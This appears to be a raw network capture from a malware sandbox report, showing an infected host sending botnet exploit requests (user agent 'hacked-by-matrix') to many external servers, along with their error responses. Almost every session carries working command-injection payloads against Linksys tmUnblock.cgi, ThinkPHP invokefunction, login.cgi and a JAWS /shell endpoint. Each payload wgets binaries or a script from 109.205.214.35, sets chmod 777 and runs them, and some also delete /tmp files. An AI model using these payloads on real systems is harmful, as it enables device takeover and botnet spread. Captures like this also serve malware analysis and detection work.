                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2276192.168.2.135745488.99.124.19680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.932148933 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2277192.168.2.1347180212.85.105.6780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.944875002 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:49.135097980 CET285INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:49 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 128
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2278192.168.2.1355148212.57.127.1080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.153146982 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:49.370649099 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.25.1
                                                        Date: Thu, 21 Mar 2024 04:23:49 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2279192.168.2.1345836212.31.21.38080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.161168098 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2280192.168.2.1350344212.162.152.24280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.541893959 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:49.708386898 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:49 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2281192.168.2.134231834.110.170.10980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.608141899 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:50.124273062 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:50.224123955 CET441INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html; charset=UTF-8
                                                        Referrer-Policy: no-referrer
                                                        Content-Length: 273
                                                        Date: Thu, 21 Mar 2024 04:23:50 GMT
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2282192.168.2.134350652.222.248.5780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.687444925 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:49.855284929 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2283192.168.2.1356896152.0.40.8880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:49.841105938 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:50.001519918 CET337INHTTP/1.1 200 OK
                                                        Content-Type:text/html; charset=UTF-8
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Content-Language:en
                                                        Mar 21, 2024 05:23:50.002062082 CET1286INData Raw: 64 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: d35<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                        Mar 21, 2024 05:23:50.002105951 CET1286INData Raw: 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c 69 74 28
                                                        Data Ascii: == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUshor
                                                        Mar 21, 2024 05:23:50.002613068 CET857INData Raw: 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f 20 6f 72
                                                        Data Ascii: se{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2284192.168.2.1346024219.79.115.7980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.159671068 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:51.791359901 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2285192.168.2.1352352154.38.155.13280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.723921061 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:50.824256897 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.9
                                                        Mime-Version: 1.0
                                                        Date: Thu, 21 Mar 2024 04:17:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3455
                                                        X-Squid-Error: ERR_INVALID_REQ 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;
                                                        Mar 21, 2024 05:23:50.824309111 CET1286INData Raw: 0a 7d 0a 0a 2f 2a 20 47 65 6e 65 72 61 6c 20 74 65 78 74 20 2a 2f 0a 70 20 7b 0a 7d 0a 0a 2f 2a 20 65 72 72 6f 72 20 62 72 69 65 66 20 64 65 73 63 72 69 70 74 69 6f 6e 20 2a 2f 0a 23 65 72 72 6f 72 20 70 20 7b 0a 7d 0a 0a 2f 2a 20 73 6f 6d 65 20
                                                        Data Ascii: }/* General text */p {}/* error brief description */#error p {}/* some data which may have caused the problem */#data {}/* the error message received from the system or other software */#sysmsg {}pre { font-family:sans-s
                                                        Mar 21, 2024 05:23:50.824321032 CET1124INData Raw: 2d 6d 61 74 72 69 78 0d 0a 48 6f 73 74 3a 20 31 32 37 2e 30 2e 30 2e 31 3a 38 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
                                                        Data Ascii: -matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive</pre> </blockquote> <p>Some possible problems are:</p> <ul> <li><p>Missing or unknown request method.<
                                                        Mar 21, 2024 05:23:51.101819038 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.9
                                                        Mime-Version: 1.0
                                                        Date: Thu, 21 Mar 2024 04:17:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3455
                                                        X-Squid-Error: ERR_INVALID_REQ 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2286192.168.2.1348814104.27.107.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:50.797415018 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
